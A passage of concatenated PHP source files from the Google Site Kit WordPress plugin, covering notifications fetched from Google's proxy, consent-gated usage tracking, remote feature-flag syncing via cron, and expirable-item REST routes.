= Sanitize::sanitize_string_list( $settings['widgetSlugs'] ); } if ( isset( $settings['isWidgetHidden'] ) ) { $sanitized_settings['isWidgetHidden'] = false !== $settings['isWidgetHidden']; } return $sanitized_settings; }; } } <?php /** * Class Google\Site_Kit\Core\Validation\Exception\Invalid_Report_Metrics_Exception * * @package Google\Site_Kit\Core\Validation\Exception * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Validation\Exception; use DomainException; /** * Exception thrown when metrics are invalid for a report request. * * @since 1.82.0 * @access private * @ignore */ class Invalid_Report_Metrics_Exception extends DomainException { } <?php /** * Class Google\Site_Kit\Core\Validation\Exception\Invalid_Report_Dimensions_Exception * * @package Google\Site_Kit\Core\Validation\Exception * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Validation\Exception; use DomainException; /** * Exception thrown when dimensions are invalid for a report request. * * @since 1.82.0 * @access private * @ignore */ class Invalid_Report_Dimensions_Exception extends DomainException { } <?php /** * Class Google\Site_Kit\Core\Notifications\Notification * * @package Google\Site_Kit\Core\Notifications * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Notifications; /** * Class for representing a notification. * * @since 1.4.0 * @access private * @ignore */ class Notification { /** * Unique notification slug. * * @since 1.4.0 * @var string */ private $slug; /** * Notification arguments. * * @since 1.4.0 * @var array */ private $args; /** * Constructor. * * @since 1.4.0 * * @param string $slug Unique notification slug. * @param array $args { * Associative array of notification arguments. * * @type string $title Required notification title. * @type string $content Required notification content. May contain inline HTML tags. * @type string $cta_url Call to action URL. * @type string $cta_label Call to action anchor text. * @type string $cta_target Call to action anchor target. * @type string $learn_more_url Learn more URL. * @type string $learn_more_label Learn more anchor text. * @type bool $dismissible Whether the notice should be dismissible. Default false. * @type string $dismiss_label Dismiss anchor text. * } */ public function __construct( $slug, array $args ) { $this->slug = (string) $slug; $this->args = array_merge( array( 'title' => '', 'content' => '', 'cta_url' => '', 'cta_label' => '', 'cta_target' => '', 'learn_more_url' => '', 'learn_more_label' => '', 'dismissible' => false, 'dismiss_label' => __( 'Dismiss', 'google-site-kit' ), ), $args ); } /** * Gets the notification's slug. * * @since 1.4.0 * * @return string Unique notification slug. */ public function get_slug() { return $this->slug; } /** * Prepares the JS representation of the Notification. * * @since 1.4.0 * * @return array */ public function prepare_for_js() { return array( 'id' => $this->get_slug(), 'title' => $this->args['title'], 'content' => $this->args['content'], 'ctaURL' => $this->args['cta_url'], 'ctaLabel' => $this->args['cta_label'], 'ctaTarget' => $this->args['cta_target'], 'learnMoreURL' => $this->args['learn_more_url'], 'learnMoreLabel' => $this->args['learn_more_label'], 'dismissible' => $this->args['dismissible'], 'dismissLabel' => $this->args['dismiss_label'], ); } } <?php /** * Class Google\Site_Kit\Core\Notifications\Notifications.php * * @package Google\Site_Kit\Core\Notifications * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Notifications; use Exception; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\Storage\Encrypted_Options; use Google\Site_Kit\Core\Storage\Options; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for managing core notifications. * * @since 1.4.0 * @access private * @ignore */ class Notifications { /** * Context instance. * * @since 1.4.0 * @var Context */ private $context; /** * Options instance. * * @since 1.4.0 * @var Options */ private $options; /** * Authentication instance. * * @since 1.8.0 * @var Authentication */ private $authentication; /** * Google_Proxy instance. * * @since 1.4.0 * @var Google_Proxy */ private $google_proxy; /** * Credentials instance. * * @since 1.4.0 * @var Credentials */ private $credentials; /** * Constructor. * * @since 1.4.0 * * @param Context $context Context instance. * @param Options $options Options instance. * @param Authentication $authentication Authentication instance. */ public function __construct( Context $context, ?Options $options = null, ?Authentication $authentication = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->google_proxy = new Google_Proxy( $this->context ); $this->authentication = $authentication ?: new Authentication( $this->context ); $this->credentials = $this->authentication->credentials(); } /** * Registers core notifications. * * @since 1.4.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); } /** * Gets related REST routes. * * @since 1.4.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { $can_use_notifications = function () { return current_user_can( Permissions::SETUP ) && $this->credentials->has(); }; return array( new REST_Route( 'core/site/data/notifications', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $endpoint = add_query_arg( array( 'site_id' => $this->credentials->get()['oauth2_client_id'], 'hl' => get_user_locale(), ), $this->google_proxy->url( '/notifications/' ) ); // Return an empty array of notifications if the user isn't using the proxy. if ( ! $this->credentials->using_proxy() ) { return new WP_REST_Response( array() ); } $response = wp_remote_get( $endpoint ); // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.wp_remote_get_wp_remote_get if ( is_wp_error( $response ) ) { return $response; } try { $response = $this->parse_response( $response ); } catch ( Exception $e ) { return new WP_Error( 'exception', $e->getMessage() ); } $data = array_map( function ( Notification $notification ) { return $notification->prepare_for_js(); }, $this->map_response_to_notifications( $response ) ); return new WP_REST_Response( $data ); }, 'permission_callback' => $can_use_notifications, ), ) ), new REST_Route( 'core/site/data/mark-notification', array( array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request['data']; if ( empty( $data['notificationID'] ) ) { return $this->missing_required_param( 'data.notificationID' ); } if ( empty( $data['notificationState'] ) ) { return $this->missing_required_param( 'data.notificationState' ); } $credentials = $this->credentials->get(); $response = wp_remote_post( $this->google_proxy->url( '/notifications/mark/' ), array( 'body' => array( 'site_id' => $credentials['oauth2_client_id'], 'site_secret' => $credentials['oauth2_client_secret'], 'notification_id' => $data['notificationID'], 'notification_state' => $data['notificationState'], ), ) ); if ( is_wp_error( $response ) ) { return $response; } try { $response = $this->parse_response( $response ); } catch ( Exception $e ) { return new WP_Error( 'exception', $e->getMessage() ); } return new WP_REST_Response( array( 'success' => isset( $response['success'] ) ? (bool) $response['success'] : false, ) ); }, 'args' => array( 'data' => array( 'required' => true, 'type' => 'object', ), ), 'permission_callback' => $can_use_notifications, ), ) ), ); } /** * Validates and parses the given JSON response into an array. * * @since 1.4.0 * * @param array $response HTTP response array. * @return mixed JSON decoded response. * @throws Exception Throws exception if response cannot be parsed or if an error is returned. */ private function parse_response( $response ) { $body = wp_remote_retrieve_body( $response ); $decoded = json_decode( $body, true ); if ( json_last_error() ) { throw new Exception( 'Error while decoding response: ' . json_last_error() ); } if ( ! empty( $decoded['error'] ) ) { throw new Exception( $decoded['error'] ); } return $decoded; } /** * Maps the response objects into Notification objects. * * @since 1.4.0 * * @param array $response Array of notification objects from API. * @return Notification[] Array of Notification objects. */ private function map_response_to_notifications( array $response ) { return array_map( function ( $notification ) { return new Notification( $notification['id'], array( 'title' => $notification['title'], 'content' => $notification['content'], 'cta_url' => $notification['ctaURL'], 'cta_label' => $notification['ctaLabel'], 'cta_target' => $notification['ctaTarget'], 'learn_more_url' => $notification['learnMoreURL'], 'learn_more_label' => $notification['learnMoreLabel'], 'dismissible' => $notification['dismissible'], 'dismiss_label' => $notification['dismissLabel'], ) ); }, $response ); } /** * Gets a WP_Error instance for the given missing required parameter. * * @since 1.4.0 * * @param string $param Missing required parameter. * @return WP_Error */ private function missing_required_param( $param ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), $param ), array( 'status' => 400 ) ); } } <?php /** * Trait Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait * * @package Google\Site_Kit\Core\Tracking * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; trait Feature_Metrics_Trait { /** * Registers the feature metrics to be tracked. * * @since 1.162.0 * * @return void */ public function register_feature_metrics() { add_filter( 'googlesitekit_feature_metrics', function ( $feature_metrics ) { $feature_metrics = array_merge( is_array( $feature_metrics ) ? $feature_metrics : array(), $this->get_feature_metrics() ); return $feature_metrics; } ); } } <?php /** * Interface Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics * * @package Google\Site_Kit\Core\Tracking * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; /** * Interface for any feature that has metrics to be tracked via the * `site-management/features` endpoint. * * @since 1.162.0 * @access private * @ignore */ interface Provides_Feature_Metrics { /** * Gets feature metrics to be tracked. * * @since 1.162.0 * * @return array Feature metrics tracking data to be tracked via the * `site-management/features` endpoint. */ public function get_feature_metrics(); } <?php /** * Class Google\Site_Kit\Core\Tracking\Feature_Metrics * * @package Google\Site_Kit * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; /** * Class managing the collection of site-wide feature metrics. * * @since 1.162.0 * @access private * @ignore */ class Feature_Metrics { /** * Registers functionality through WordPress hooks. * * @since 1.162.0 */ public function register() { add_filter( 'googlesitekit_features_request_data', function ( $body ) { /** * Filters feature metrics data sent with the features request. * * @since 1.162.0 * * @param array $feature_metrics Feature metrics tracking data to be sent with the features request. */ $feature_metrics = apply_filters( 'googlesitekit_feature_metrics', array() ); $body['feature_metrics'] = $feature_metrics; return $body; } ); } } <?php /** * Class Google\Site_Kit\Core\Tracking\REST_Tracking_Consent_Controller * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use WP_REST_Server; use WP_REST_Request; use WP_REST_Response; /** * Class managing admin tracking. * * @since 1.49.0 * @access private * @ignore */ class REST_Tracking_Consent_Controller { use Method_Proxy_Trait; /** * Tracking_Consent instance. * * @since 1.49.0 * * @var Tracking_Consent */ protected $consent; /** * Constructor. * * @@since 1.49.0 * * @param Tracking_Consent $tracking_consent Tracking consent instance. */ public function __construct( Tracking_Consent $tracking_consent ) { $this->consent = $tracking_consent; } /** * Registers functionality through WordPress hooks. * * @since 1.49.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', $this->get_method_proxy( 'get_rest_routes' ) ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $routes ) { return array_merge( $routes, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/tracking', ) ); } ); } /** * Is tracking active for the current user? * * @since 1.49.0 * * @return bool True if tracking enabled, and False if not. */ public function is_active() { return (bool) $this->consent->get(); } /** * Gets tracking routes. * * @since 1.49.0 * * @param array $routes Array of routes. * @return array Modified array of routes that contains tracking related routes. */ private function get_rest_routes( $routes ) { $can_access_tracking = function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }; $tracking_callback = function () { return new WP_REST_Response( array( 'enabled' => $this->is_active(), ) ); }; return array_merge( $routes, array( new REST_Route( 'core/user/data/tracking', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => $tracking_callback, 'permission_callback' => $can_access_tracking, ), array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) use ( $tracking_callback ) { $data = $request->get_param( 'data' ); $enabled = ! empty( $data['enabled'] ); $this->consent->set( $enabled ); return $tracking_callback( $request ); }, 'permission_callback' => $can_access_tracking, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'enabled' => array( 'type' => 'boolean', 'required' => true, ), ), ), ), ), ) ), ) ); } } <?php /** * Class Google\Site_Kit\Core\Tracking\Tracking * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Admin\Screen; use Google\Site_Kit\Core\Admin\Screens; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class managing admin tracking. * * @since 1.49.0 * @access private * @ignore */ final class Tracking { use Method_Proxy_Trait; const TRACKING_ID = 'G-EQDN3BWDSD'; /** * Screens instance. * * @since 1.49.0 * * @var Screens */ protected $screens; /** * Tracking_Consent instance. * * @since 1.49.0 * * @var Tracking_Consent */ protected $consent; /** * REST_Tracking_Consent_Controller instance. * * @since 1.49.0 * * @var REST_Tracking_Consent_Controller */ private $rest_controller; /** * Constructor. * * @since 1.49.0 * * @param Context $context Context instance. * @param User_Options $user_options Optional. User_Options instance. Default is a new instance. * @param Screens $screens Optional. Screens instance. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null, ?Screens $screens = null ) { $user_options = $user_options ?: new User_Options( $context ); $this->screens = $screens ?: new Screens( $context ); $this->consent = new Tracking_Consent( $user_options ); $this->rest_controller = new REST_Tracking_Consent_Controller( $this->consent ); } /** * Registers functionality through WordPress hooks. * * @since 1.49.0 */ public function register() { $this->consent->register(); $this->rest_controller->register(); add_filter( 'googlesitekit_inline_tracking_data', $this->get_method_proxy( 'inline_js_tracking_data' ) ); } /** * Is tracking active for the current user? * * @since 1.49.0 * * @return bool True if tracking enabled, and False if not. */ public function is_active() { return (bool) $this->consent->get(); } /** * Adds / modifies tracking relevant data to pass to JS. * * @since 1.78.0 * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_tracking_data( $data ) { global $hook_suffix; $data['isSiteKitScreen'] = $this->screens->get_screen( $hook_suffix ) instanceof Screen; $data['trackingEnabled'] = $this->is_active(); $data['trackingID'] = self::TRACKING_ID; return $data; } } <?php /** * Class Google\Site_Kit\Core\Tracking\Tracking_Consent * * @package Google\Site_Kit\Core\Tracking * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tracking; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class managing a user's anonymous usage tracking consent. * * @since 1.49.0 * @access private * @ignore */ class Tracking_Consent extends User_Setting { /** * The user option name for this setting. * * @var string */ const OPTION = 'googlesitekit_tracking_optin'; /** * Gets the value of the setting. * * @since 1.49.0 * * @return bool Whether the current user has consented to anonymous tracking. */ public function get() { return (bool) $this->user_options->get( static::OPTION ); } /** * Gets the expected value type. * * @since 1.49.0 * * @return string The type name. */ protected function get_type() { return 'boolean'; } /** * Gets the default value. * * @since 1.49.0 * * @return bool The default value. */ protected function get_default() { return false; } } <?php /** * Interface Google\Site_Kit\Core\Guards\Guard_Interface * * @package Google\Site_Kit\Core\Guards * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Guards; use WP_Error; /** * Interface for a guard. * * @since 1.24.0 * @access private * @ignore */ interface Guard_Interface { /** * Determines whether the guarded entity can be activated or not. * * @since 1.24.0 * * @return bool|WP_Error TRUE if guarded entity can be activated, otherwise FALSE or an error. */ public function can_activate(); } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features_Cron * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; /** * Class providing cron implementation for remote features. * * @since 1.133.0 * @access private * @ignore */ class Remote_Features_Cron { const CRON_ACTION = 'googlesitekit_cron_update_remote_features'; /** * Cron callback reference. * * @var callable */ private $cron_callback; /** * Constructor. * * @since 1.133.0 * * @param callable $callback Function to call on the cron action. */ public function __construct( callable $callback ) { $this->cron_callback = $callback; } /** * Registers functionality through WordPress hooks. * * @since 1.133.0 */ public function register() { add_action( self::CRON_ACTION, $this->cron_callback ); } /** * Schedules cron if not already set. * * @since 1.133.0 */ public function maybe_schedule_cron() { if ( ! wp_next_scheduled( self::CRON_ACTION ) && ! wp_installing() ) { wp_schedule_event( time(), 'twicedaily', self::CRON_ACTION ); } } } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; use Closure; use Google\Site_Kit\Core\Storage\Setting; /** * Class handling the storage of remote features. * * @since 1.118.0 * @since 1.133.0 Changed to extend Setting * @access private * @ignore */ final class Remote_Features extends Setting { /** * Option key in options table to store remote features. */ const OPTION = 'googlesitekitpersistent_remote_features'; /** * Gets the expected value type. * * @return string */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @return array */ protected function get_default() { return array( 'last_updated_at' => 0, ); } /** * Includes the current timestamp to the setting and updates it. * * @since 1.134.0 * * @param array $features features array. */ public function update( $features ) { $features['last_updated_at'] = time(); return $this->set( $features ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @return Closure */ protected function get_sanitize_callback() { return function ( $value ) { if ( ! is_array( $value ) ) { return array(); } $new_value = array(); foreach ( $value as $feature => $meta ) { if ( 'last_updated_at' === $feature ) { $new_value[ $feature ] = is_int( $meta ) ? $meta : 0; } else { $new_value[ $feature ] = array( 'enabled' => ! empty( $meta['enabled'] ) ); } } return $new_value; }; } } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features_Provider * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Guards\Site_Connected_Guard; use Google\Site_Kit\Core\Authentication\Guards\Using_Proxy_Connection_Guard; use Google\Site_Kit\Core\Storage\Encrypted_Options; use Google\Site_Kit\Core\Storage\Options; /** * Class providing the integration of remote features. * * @since 1.133.0 * @access private * @ignore */ class Remote_Features_Provider { /** * Credentials instance. * * @var Credentials */ private Credentials $credentials; /** * Remote_Features instance. * * @var Remote_Features */ private Remote_Features $setting; /** * Remote_Features_Activation instance. * * @var Remote_Features_Activation */ private Remote_Features_Activation $activation; /** * Remote_Features_Syncer instance. * * @var Remote_Features_Syncer */ private Remote_Features_Syncer $syncer; /** * Remote_Features_Cron instance. * * @var Remote_Features_Cron */ private Remote_Features_Cron $cron; /** * Remote_Features_Fallback instance. * * @var Remote_Features_Fallback */ private Remote_Features_Fallback $fallback; /** * Constructor. * * @since 1.133.0 * * @param Context $context Context instance. * @param Options $options Options instance. */ public function __construct( Context $context, Options $options ) { $this->credentials = new Credentials( new Encrypted_Options( $options ) ); $this->setting = new Remote_Features( $options ); $this->activation = new Remote_Features_Activation( $this->setting ); $this->syncer = new Remote_Features_Syncer( $this->setting, fn() => ( new Google_Proxy( $context ) )->get_features( $this->credentials ), new Site_Connected_Guard( $this->credentials ), new Using_Proxy_Connection_Guard( $this->credentials ) ); $this->cron = new Remote_Features_Cron( array( $this->syncer, 'pull_remote_features' ) ); $this->fallback = new Remote_Features_Fallback( $this->setting, $this->syncer ); } /** * Registers functionality through WordPress hooks. * * @since 1.133.0 */ public function register() { $this->setting->register(); $this->activation->register(); $this->cron->register(); add_action( 'admin_init', fn () => $this->on_admin_init() ); add_action( 'heartbeat_tick', fn ( $response, $screen_id ) => $this->on_heartbeat_tick( $screen_id ), 10, 2 ); } /** * Handles the heartbeat AJAX callback. * * @param string $screen_id The screen ID. */ protected function on_heartbeat_tick( $screen_id ) { if ( 'toplevel_page_googlesitekit-dashboard' !== $screen_id ) { return; } $this->fallback->remote_features_sync_fallback(); } /** * Handles delayed registration on admin_init. */ protected function on_admin_init() { if ( ! $this->credentials->using_proxy() ) { return; } $this->cron->maybe_schedule_cron(); // Sync remote features when credentials change (e.g. during setup). $this->credentials->on_change( array( $this->syncer, 'pull_remote_features' ) ); } } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features_Syncer * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; use Closure; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Class handling the synchronization of remote features with local storage. * * @since 1.133.0 * @access private * @ignore */ class Remote_Features_Syncer { /** * Remote_Features instance. * * @var Remote_Features */ private $remote_features; /** * Function which fetches features. * * @var Closure */ private $fetch_features; /** * Guard instances. * * @var Guard_Interface[] */ private array $guards; /** * Constructor. * * @since 1.133.0 * * @param Remote_Features $remote_features Remote_Features instance. * @param Closure $fetch_features Function which fetches features. * @param Guard_Interface ...$guards Guard instances. */ public function __construct( Remote_Features $remote_features, Closure $fetch_features, Guard_Interface ...$guards ) { $this->remote_features = $remote_features; $this->fetch_features = $fetch_features; $this->guards = $guards; } /** * Fetches the latest remote features and sets them in storage. * * @since 1.133.0 */ public function pull_remote_features() { foreach ( $this->guards as $guard ) { if ( ! $guard->can_activate() ) { return; } } $features = ( $this->fetch_features )(); if ( ! is_wp_error( $features ) && is_array( $features ) ) { $this->remote_features->update( $features ); } } } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features_Activation * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class handling the application of remote feature activation. * * @since 1.133.0 * @access private * @ignore */ class Remote_Features_Activation { use Method_Proxy_Trait; /** * Remote_Features instance. * * @var Remote_Features */ private $remote_features; /** * Loaded features. * * @var array */ private $features; /** * Constructor. * * @param Remote_Features $remote_features Remote_Features instance. */ public function __construct( Remote_Features $remote_features ) { $this->remote_features = $remote_features; } /** * Registers functionality through WordPress hooks. * * @since 1.133.0 */ public function register() { add_filter( 'googlesitekit_is_feature_enabled', $this->get_method_proxy( 'enable_features' ), 10, 2 ); } /** * Gets the current set of remote features. * * @return array|mixed */ private function get_features() { if ( null === $this->features ) { $this->features = $this->remote_features->get(); } return $this->features; } /** * Filters feature flags using features stored in options. * * @since 1.133.0 * * @param boolean $feature_enabled Original value of the feature. * @param string $feature_name Feature name. * @return boolean State flag from options if it is available, otherwise the original value. */ private function enable_features( $feature_enabled, $feature_name ) { $features = $this->get_features(); if ( isset( $features[ $feature_name ]['enabled'] ) ) { return filter_var( $features[ $feature_name ]['enabled'], FILTER_VALIDATE_BOOLEAN ); } return $feature_enabled; } } <?php /** * Class Google\Site_Kit\Core\Remote_Features\Remote_Features_Fallback * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Remote_Features; /** * Class providing the integration of remote features. * * @since 1.134.0 * @access private * @ignore */ class Remote_Features_Fallback { /** * Remote_Features_Syncer instance. * * @var Remote_Features_Syncer */ private Remote_Features_Syncer $syncer; /** * Remote_Features instance. * * @var Remote_Features */ private Remote_Features $setting; /** * Constructor. * * @since 1.134.0 * * @param Remote_Features $setting Remote_Features instance. * @param Remote_Features_Syncer $syncer Remote_Features_Syncer instance. */ public function __construct( Remote_Features $setting, Remote_Features_Syncer $syncer ) { $this->syncer = $syncer; $this->setting = $setting; } /** * Fallback for syncing the remote features. * * @since 1.134.0 */ public function remote_features_sync_fallback() { $remote_features = $this->setting->get(); $last_sync_at = $remote_features['last_updated_at'] ?? 0; $is_sync_overdue = ( time() - $last_sync_at ) > DAY_IN_SECONDS; if ( $is_sync_overdue || ! $last_sync_at ) { $this->syncer->pull_remote_features(); } } } <?php /** * Class Google\Site_Kit\Core\Expirables\REST_Expirable_Items_Controller * * @package Google\Site_Kit\Core\Expirables * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Expirables; use Google\Site_Kit\Core\Expirables\Expirable_Items; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling expirable items rest routes. * * @since 1.128.0 * @access private * @ignore */ class REST_Expirable_Items_Controller { /** * Expirable_Items instance. * * @since 1.128.0 * @var Expirable_Items */ protected $expirable_items; /** * Constructor. * * @since 1.128.0 * * @param Expirable_Items $expirable_items Expirable items instance. */ public function __construct( Expirable_Items $expirable_items ) { $this->expirable_items = $expirable_items; } /** * Registers functionality through WordPress hooks. * * @since 1.128.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/expirable-items', ) ); } ); } /** * Gets REST route instances. * * @since 1.128.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_manage_expirable_item = function () { return current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/expirable-items', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->expirable_items->get() ); }, 'permission_callback' => $can_manage_expirable_item, ) ), new REST_Route( 'core/user/data/set-expirable-item-timers', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request['data']; if ( empty( $data ) || ! is_array( $data ) ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), 'items' ), array( 'status' => 400 ) ); } foreach ( $data as $datum ) { if ( empty( $datum['slug'] ) ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), 'slug' ), array( 'status' => 400 ) ); } $expiration = null; if ( isset( $datum['expiration'] ) && intval( $datum['expiration'] ) > 0 ) { $expiration = $datum['expiration']; } if ( ! $expiration ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is invalid: %s.', 'google-site-kit' ), 'expiration' ), array( 'status' => 400 ) ); } $this->expirable_items->add( $datum['slug'], $expiration ); } return new WP_REST_Response( $this->expirable_items->get() ); }, 'permission_callback' => $can_manage_expirable_item, 'args' => array( 'data' => array( 'type' => 'array', 'required' => true, 'items' => array( 'type' => 'object', 'additionalProperties' => false, 'properties' => array( 'slug' => array( 'type' => 'string', 'required' => true, ), 'expiration' => array( 'type' => 'integer', 'required' => true, ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Expirables\Expirables * * @package Google\Site_Kit\Core\Expirables * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Expirables; use Google\Site_Kit\Core\Expirables\Expirable_Items; use Google\Site_Kit\Core\Expirables\REST_Expirable_Items_Controller; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling expirables. * * @since 1.128.0 * @access private * @ignore */ class Expirables { /** * Expirable_Items instance. * * @since 1.128.0 * @var Expirable_Items */ protected $expirable_items; /** * REST_Expirable_Items_Controller instance. * * @since 1.128.0 * @var REST_Expirable_Items_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.128.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User option API. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null ) { $this->expirable_items = new Expirable_Items( $user_options ?: new User_Options( $context ) ); $this->rest_controller = new REST_Expirable_Items_Controller( $this->expirable_items ); } /** * Gets the reference to the Expirable_Items instance. * * @since 1.128.0 * * @return Expirable_Items An instance of the Expirable_Items class. */ public function get_expirable_items() { return $this->expirable_items; } /** * Registers functionality through WordPress hooks. * * @since 1.128.0 */ public function register() { $this->expirable_items->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\Expirables\Expirable_Items * * @package Google\Site_Kit\Core\Expirables * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Expirables; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for handling expirables items. * * @since 1.128.0 * @access private * @ignore */ class Expirable_Items extends User_Setting { /** * The user option name for this setting. * * @note This option is prefixed differently so that it will persist across disconnect/reset. */ const OPTION = 'googlesitekitpersistent_expirable_items'; /** * Adds one 